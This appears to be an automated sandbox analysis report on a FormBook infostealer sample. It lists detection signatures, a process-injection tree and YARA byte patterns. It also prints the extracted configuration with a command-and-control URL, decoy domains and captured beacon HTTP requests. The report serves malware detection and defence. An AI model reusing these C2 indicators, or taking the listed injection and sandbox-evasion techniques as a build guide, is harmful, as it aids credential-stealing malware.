Analysis Report ox87DNNM8d.exe

Overview

General Information

Sample Name: ox87DNNM8d.exe
Analysis ID: 411767
MD5: 41e38bcd6f5f3001c2e4f08ebcd2396c
SHA1: 2f3b2173d7a5a3a19e8a73d5fbfde7abc1836909
SHA256: 4e2b4396335fc6d3e6ff8c19b326f0f6342f537ba026ce1901d2122b2c7b3e4c

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • ox87DNNM8d.exe (PID: 4368 cmdline: 'C:\Users\user\Desktop\ox87DNNM8d.exe' MD5: 41E38BCD6F5F3001C2E4F08EBCD2396C)
    • ox87DNNM8d.exe (PID: 5656 cmdline: C:\Users\user\Desktop\ox87DNNM8d.exe MD5: 41E38BCD6F5F3001C2E4F08EBCD2396C)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • systray.exe (PID: 6544 cmdline: C:\Windows\SysWOW64\systray.exe MD5: 1373D481BE4C8A6E5F5030D2FB0A0C68)
          • cmd.exe (PID: 6824 cmdline: /c del 'C:\Users\user\Desktop\ox87DNNM8d.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.panda810.com/sve/"], "decoy": ["rockouqe.com", "secureproductsolutions.net", "josephserino.com", "operationstrategy.com", "umrohalfatih.com", "humanityenlightened.com", "taylorxgroup.com", "francescopetroni.net", "anaume-kun.com", "galleryalireza.com", "alimamavn.com", "tym0769.com", "trendselection.club", "warmupspod.com", "v-work.xyz", "aclmspecialmeeting2020.com", "youporn-live.net", "germinatebio.net", "hempnseeds.com", "ezfto.com", "pengruncapital.com", "voxitor.com", "hempdivasmag.com", "everydayleadershipinstitute.com", "biking-division.com", "livingstonemoments.com", "vstarfireworks.com", "abilitybrazil.com", "gixaa.com", "kp-dental.com", "developmentignited.com", "8155a.com", "petylook.com", "agrogroupkz.com", "germsbuzzter.com", "valley-bitcoin.com", "dcsdeliveryaz.website", "elitefriendlies.com", "pinoywebtools.com", "circuleather.com", "mioskinplus.info", "tamaraog.com", "maxfelicitavideo.com", "americacivics.com", "shebawatches.com", "meisammirhashemi.com", "nelivo.com", "real-dating-clubs2.com", "poishem.directory", "geminein.club", "soundalchemyadvanced.com", "kidswrtingpadstore.com", "cya-wonder.club", "tuqof.com", "showbizpr.com", "homo-nomad.com", "bcc-cbd.com", "papayacrisp.com", "paymentink.gold", "purejoyclothing.com", "newsadvices.com", "gungalmata.com", "viewsfromthedriversseat.com", "techriew.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x183f9:$sqlite3step: 68 34 1C 7B E1
    • 0x1850c:$sqlite3step: 68 34 1C 7B E1
    • 0x18428:$sqlite3text: 68 38 2A 90 C5
    • 0x1854d:$sqlite3text: 68 38 2A 90 C5
    • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
    00000003.00000002.281369748.0000000001730000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      00000003.00000002.281369748.0000000001730000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

      Unpacked PEs

      Source | Rule | Description | Author | Strings
      3.2.ox87DNNM8d.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
        3.2.ox87DNNM8d.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.2.ox87DNNM8d.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x183f9:$sqlite3step: 68 34 1C 7B E1
        • 0x1850c:$sqlite3step: 68 34 1C 7B E1
        • 0x18428:$sqlite3text: 68 38 2A 90 C5
        • 0x1854d:$sqlite3text: 68 38 2A 90 C5
        • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
        1.2.ox87DNNM8d.exe.400dbc8.3.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
          1.2.ox87DNNM8d.exe.400dbc8.3.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x12fd98:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x130002:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15c3b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15c622:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13bb25:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x168145:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13b611:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x167c31:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13bc27:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x168247:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13bd9f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x1683bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x130a1a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x15d03a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x13a88c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x166eac:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x131713:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x15dd33:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1417c7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x16dde7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1427ca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          AV Detection:

          Found malware configuration
          Source: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp, Malware Configuration Extractor: FormBook (same configuration as shown under Malware Configuration)
          Multi AV Scanner detection for submitted file
          Source: ox87DNNM8d.exe, Virustotal: Detection: 56%
          Source: ox87DNNM8d.exe, Metadefender: Detection: 38%
          Source: ox87DNNM8d.exe, ReversingLabs: Detection: 65%
          Yara detected FormBook
          Source: Yara match, File source: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.281369748.0000000001730000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.281290291.00000000015E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000008.00000002.493625427.0000000000AA0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.234588732.0000000003F79000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000008.00000002.492941508.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 3.2.ox87DNNM8d.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.2.ox87DNNM8d.exe.400dbc8.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.2.ox87DNNM8d.exe.400000.0.unpack, type: UNPACKEDPE
          Source: 3.2.ox87DNNM8d.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: ox87DNNM8d.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
          Source: ox87DNNM8d.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: systray.pdb source: ox87DNNM8d.exe, 00000003.00000002.281473750.0000000001808000.00000004.00000020.sdmp
          Source: Binary string: systray.pdbGCTL source: ox87DNNM8d.exe, 00000003.00000002.281473750.0000000001808000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: ox87DNNM8d.exe, 00000003.00000003.233330947.0000000001900000.00000004.00000001.sdmp, systray.exe, 00000008.00000003.282590732.0000000000CC0000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: ox87DNNM8d.exe, 00000003.00000003.233330947.0000000001900000.00000004.00000001.sdmp, systray.exe
          Source: C:\Users\user\Desktop\ox87DNNM8d.exe, Code function: 4x nop then pop edi, 3_2_00416C6A
          Source: C:\Users\user\Desktop\ox87DNNM8d.exe, Code function: 4x nop then pop edi, 3_2_0040E42F
          Source: C:\Windows\SysWOW64\systray.exe, Code function: 4x nop then pop edi, 8_2_0017E42F
          Source: C:\Windows\SysWOW64\systray.exe, Code function: 4x nop then pop edi, 8_2_00186C6A

          Networking:

          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractor, URLs: www.panda810.com/sve/
          Source: global traffic, HTTP traffic detected: GET /sve/?B6Ah=exmy3Nx7PpUJKJt1HtiGWNpuQz3EYRIgq3k+uiZc9JLQuvdlfCRkPG1S5SdPXsQAS6a5&8pW=2dUh0da HTTP/1.1 | Host: www.dcsdeliveryaz.website | Connection: close
          Source: global traffic, HTTP traffic detected: GET /sve/?8pW=2dUh0da&B6Ah=pTnyDIvt+g7sdgQmMg9D2FnTPO22hVGFgxtUPmNZyFP4G/454L1vxjiDnOTVCmVO7LzE HTTP/1.1 | Host: www.americacivics.com | Connection: close
          Source: global traffic, HTTP traffic detected: GET /sve/?B6Ah=2mSxzHKvGhdVKk9ZF/49Uvkx+tNG2gtFJsc3MZrG0ttjvP+42CyBXtijrWDGJsqiNYNw&8pW=2dUh0da HTTP/1.1 | Host: www.vstarfireworks.com | Connection: close
          Source: Joe Sandbox View, ASN Name: DREAMHOST-ASUS
          Source: Joe Sandbox View, ASN Name: HKKFGL-AS-APHKKwaifongGroupLimitedHK
          Source: unknown, DNS traffic detected: queries for: www.secureproductsolutions.net
          Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Cache-Control: no-store | Pragma: no-cache | Content-Type: text/html | Server: IIS | X-Powered-By: WAF/2.0 | Date: Wed, 12 May 2021 05:07:40 GMT | Connection: close | Content-Length: 1163
          Source: ox87DNNM8d.exe, 00000001.00000002.234176049.0000000002F71000.00000004.00000001.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp, String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
          Source: ox87DNNM8d.exe, 00000001.00000002.233772608.0000000001240000.00000004.00000020.sdmp, Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match, File source: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.281369748.0000000001730000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.281290291.00000000015E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000008.00000002.493625427.0000000000AA0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.234588732.0000000003F79000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000008.00000002.492941508.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 3.2.ox87DNNM8d.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.2.ox87DNNM8d.exe.400dbc8.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.2.ox87DNNM8d.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.281369748.0000000001730000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.281369748.0000000001730000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.281290291.00000000015E0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.281290291.00000000015E0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.493625427.0000000000AA0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.493625427.0000000000AA0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.234588732.0000000003F79000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.234588732.0000000003F79000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.492941508.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.492941508.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 3.2.ox87DNNM8d.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.ox87DNNM8d.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 1.2.ox87DNNM8d.exe.400dbc8.3.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.ox87DNNM8d.exe.400dbc8.3.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 3.2.ox87DNNM8d.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.ox87DNNM8d.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\ox87DNNM8d.exeCode function: 3_2_00419D50 NtCreateFile,3_2_00419D50
          Source: C:\Users\user\Desktop\ox87DNNM8d.exeCode function: 3_2_00419E00 NtReadFile,3_2_00419E00
          Source: C:\Users\user\Desktop\ox87DNNM8d.exeCode function: 3_2_00419E80 NtClose,3_2_00419E80
          Source: C:\Users\user\Desktop\ox87DNNM8d.exeCode function: 3_2_00419F30 NtAllocateVirtualMemory,3_2_00419F30
          Source: C:\Users\user\Desktop\ox87DNNM8d.exeCode function: 3_2_00419D4B NtCreateFile,3_2_00419D4B
          Source: C:\Users\user\Desktop\ox87DNNM8d.exeCode function: 3_2_00419DFC NtReadFile,3_2_00419DFC
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_045D9840 NtDelayExecution,LdrInitializeThunk,8_2_045D9840
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_045D9860 NtQuerySystemInformation,LdrInitializeThunk,8_2_045D9860
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_045D9540 NtReadFile,LdrInitializeThunk,8_2_045D9540
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_045D9910 NtAdjustPrivilegesToken,LdrInitializeThunk,8_2_045D9910
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_045D95D0 NtClose,LdrInitializeThunk,8_2_045D95D0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_045D99A0 NtCreateSection,LdrInitializeThunk,8_2_045D99A0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_045D9A50 NtCreateFile,LdrInitializeThunk,8_2_045D9A50
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_045D9650 NtQueryValueKey,LdrInitializeThunk,8_2_045D9650
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_045D9660 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_045D9660
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_045D96D0 NtCreateKey,LdrInitializeThunk,8_2_045D96D0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_045D96E0 NtFreeVirtualMemory,LdrInitializeThunk,8_2_045D96E0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_045D9710 NtQueryInformationToken,LdrInitializeThunk,8_2_045D9710
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_045D9FE0 NtCreateMutant,LdrInitializeThunk,8_2_045D9FE0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_045D9780 NtMapViewOfSection,LdrInitializeThunk,8_2_045D9780
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_045DB040 NtSuspendThread,8_2_045DB040
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_045D9820 NtEnumerateKey,8_2_045D9820
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_045D98F0 NtReadVirtualMemory,8_2_045D98F0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_045D98A0 NtWriteVirtualMemory,8_2_045D98A0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_045D9950 NtQueueApcThread,8_2_045D9950
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_045D9560 NtWriteFile,8_2_045D9560
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_045DAD30 NtSetContextThread,8_2_045DAD30
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_045D9520 NtWaitForSingleObject,8_2_045D9520
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_045D99D0 NtCreateProcessEx,8_2_045D99D0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_045D95F0 NtQueryInformationFile,8_2_045D95F0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_045D9670 NtQueryInformationProcess,8_2_045D9670
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_045D9610 NtEnumerateValueKey,8_2_045D9610
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_045D9A10 NtQuerySection,8_2_045D9A10
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_045D9A00 NtProtectVirtualMemory,8_2_045D9A00
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_045D9A20 NtResumeThread,8_2_045D9A20
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_045D9A80 NtOpenDirectoryObject,8_2_045D9A80
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_045D9770 NtSetInformationFile,8_2_045D9770
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_045DA770 NtOpenThread,8_2_045DA770
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_045D9760 NtOpenProcess,8_2_045D9760
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_045DA710 NtOpenProcessToken,8_2_045DA710
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_045D9B00 NtSetValueKey,8_2_045D9B00
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_045D9730 NtQueryVirtualMemory,8_2_045D9730
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_045DA3B0 NtGetContextThread,8_2_045DA3B0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_045D97A0 NtUnmapViewOfSection,8_2_045D97A0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_00189D50 NtCreateFile,8_2_00189D50
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_00189E00 NtReadFile,8_2_00189E00
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_00189E80 NtClose,8_2_00189E80
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_00189F30 NtAllocateVirtualMemory,8_2_00189F30
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_00189D4B NtCreateFile,8_2_00189D4B
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_00189DFC NtReadFile,8_2_00189DFC
          Source: ox87DNNM8d.exe, 00000001.00000002.233772608.0000000001240000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs ox87DNNM8d.exe
          Source: ox87DNNM8d.exe, 00000001.00000002.233268341.0000000000C08000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameDateTimeNative.exe. vs ox87DNNM8d.exe
          Source: ox87DNNM8d.exe, 00000001.00000002.237220905.0000000006230000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameDSASignature.dll@ vs ox87DNNM8d.exe
          Source: ox87DNNM8d.exe, 00000001.00000002.234176049.0000000002F71000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSimpleUI.dll( vs ox87DNNM8d.exe
          Source: ox87DNNM8d.exe, 00000003.00000002.281473750.0000000001808000.00000004.00000020.sdmpBinary or memory string: OriginalFilenamesystray.exej% vs ox87DNNM8d.exe
          Source: ox87DNNM8d.exe, 00000003.00000002.280995621.0000000001068000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameDateTimeNative.exe. vs ox87DNNM8d.exe
          Source: ox87DNNM8d.exe, 00000003.00000002.281676487.0000000001BBF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs ox87DNNM8d.exe
          Source: ox87DNNM8d.exeBinary or memory string: OriginalFilenameDateTimeNative.exe. vs ox87DNNM8d.exe
          Source: ox87DNNM8d.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
          Source: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.281369748.0000000001730000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.281369748.0000000001730000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.281290291.00000000015E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
